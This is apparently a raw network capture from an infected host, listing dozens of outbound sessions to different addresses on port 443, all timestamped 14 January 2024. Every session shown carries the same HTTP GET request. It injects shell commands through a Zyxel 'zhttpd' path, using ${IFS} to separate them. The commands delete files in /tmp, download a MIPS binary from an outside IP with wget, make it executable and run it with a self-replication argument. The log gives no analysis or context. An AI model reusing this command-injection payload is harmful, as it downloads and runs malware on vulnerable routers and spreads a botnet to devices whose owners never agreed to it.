                                            Jan 14, 2024 15:50:51.646482944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7463192.168.2.233812069.56.242.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.646490097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7464192.168.2.234228066.170.245.146443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.646523952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7465192.168.2.233964057.238.129.90443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.646557093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7466192.168.2.2360706194.197.173.164443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.646574974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7467192.168.2.234410086.111.20.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.646640062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7468192.168.2.2338356145.154.243.26443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.646645069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7469192.168.2.234559070.248.75.101443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.646667957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7470192.168.2.234033086.55.53.155443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.646709919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7471192.168.2.234917862.51.236.25443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.646722078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7472192.168.2.233326818.182.252.45443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.646749020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7473192.168.2.2350718131.160.38.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.646763086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7474192.168.2.234450644.8.78.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.646826982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7475192.168.2.2354526161.186.194.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.646832943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7476192.168.2.2356526179.228.226.101443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.646857023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7477192.168.2.234787268.185.249.35443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.646877050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7478192.168.2.2340288206.124.49.121443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.646895885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7479192.168.2.2340532166.71.54.167443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.646945000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7480192.168.2.2350712216.196.142.235443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.646972895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7481192.168.2.2335140144.7.61.136443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.646998882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7482192.168.2.2346048216.214.144.72443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.647032976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7483192.168.2.23493708.94.80.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.647051096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7484192.168.2.2357474167.157.24.213443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.647087097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7485192.168.2.233488865.35.207.198443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.647130966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7486192.168.2.235068652.37.135.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.647144079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7487192.168.2.235334285.182.227.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.647171021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7488192.168.2.2350202193.30.139.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.647208929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7489192.168.2.2352586198.44.200.179443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.647255898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7490192.168.2.2344690222.65.52.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.647284031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7491192.168.2.235050282.77.26.213443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.647308111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7492192.168.2.2334682191.17.91.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.647315025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7493192.168.2.233854872.135.240.53443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.647336006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7494192.168.2.235267012.224.36.61443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.647355080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7495192.168.2.233940450.1.59.13443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.647392988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7496192.168.2.235670892.110.176.134443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.647393942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7497192.168.2.234662895.145.25.112443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.647429943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7498192.168.2.2348884122.243.10.49443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.647454977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7499192.168.2.235632060.62.71.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.647515059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7500192.168.2.2357638197.49.212.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.647525072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7501192.168.2.235269064.45.99.54443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.647543907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7502192.168.2.2354544168.119.178.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.647561073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7503192.168.2.235140862.149.48.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.647612095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7504192.168.2.2340248155.169.73.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.647643089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7505192.168.2.2344720117.105.223.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.647663116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7506192.168.2.235207220.246.155.202443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.647675037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7507192.168.2.234906646.228.47.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.647710085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7508192.168.2.2360104131.41.202.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.647754908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7509192.168.2.2335532123.88.139.166443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.647787094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7510192.168.2.2339934179.193.251.212443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.647790909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7511192.168.2.23491544.152.96.141443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.647824049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7512192.168.2.235364419.167.114.0443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.647849083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7513192.168.2.2360838152.62.53.248443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.647865057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7514192.168.2.234023662.5.107.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.647905111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7515192.168.2.23554224.58.210.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.647945881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7516192.168.2.23328522.204.127.98443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.647962093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7517192.168.2.2358610102.195.249.78443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.647994995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7518192.168.2.2336444186.7.85.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648026943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7519192.168.2.2342766102.240.167.225443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648027897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7520192.168.2.236055666.48.20.136443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648071051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7521192.168.2.233794051.208.148.203443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648082018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7522192.168.2.2350740122.143.244.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648097992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7523192.168.2.2338292216.224.247.218443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648099899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7524192.168.2.2357298184.113.235.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648123980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7525192.168.2.2342972201.191.147.144443
                                            TimestampBytes transferredDirectionData
